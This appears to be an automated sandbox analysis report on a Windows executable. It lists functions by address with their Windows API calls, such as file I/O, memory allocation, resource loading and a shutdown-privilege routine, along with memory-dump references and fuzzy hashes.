Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

Function 00401FD4 Relevance: 3.1, APIs: 2, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017

Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
String ID:
API String ID: 296031713-0
Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

Function 00401658 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2

Strings

DRt, xrefs: 00401687, 004016C7

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FreeVirtual
String ID: DRt
API String ID: 1263568516-1463252733
Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8

Function 00406FA0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000), ref: 00406FAA
LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

Function 0040766C Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693

Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

Function 0040762C Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

Function 004075C4 Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7

Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766

Function 00405280 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F

Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9

Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98

Function 00407576 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8

Function 00407578 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8

Function 004069DC Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428

Function 004076C8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF

Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676

Function 00407284 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F

Function 004076AC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(?,020E8000,0040AA59,00000000), ref: 004076B3

Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666

Function 00406FFB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,00407019), ref: 0040700C

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519

Function 00407017 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,00407019), ref: 0040700C

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B

Function 00406970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
Instruction Fuzzy Hash:

Function 00407F10 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA

Function 00407548 Relevance: 1.3, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00407558

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D

Function 00407EB8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654

Non-executed Functions

Function 00409448 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 00409457
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3

Strings

SeShutdownPrivilege, xrefs: 0040946F

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F

Function 00409C34 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E

Function 00405258 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

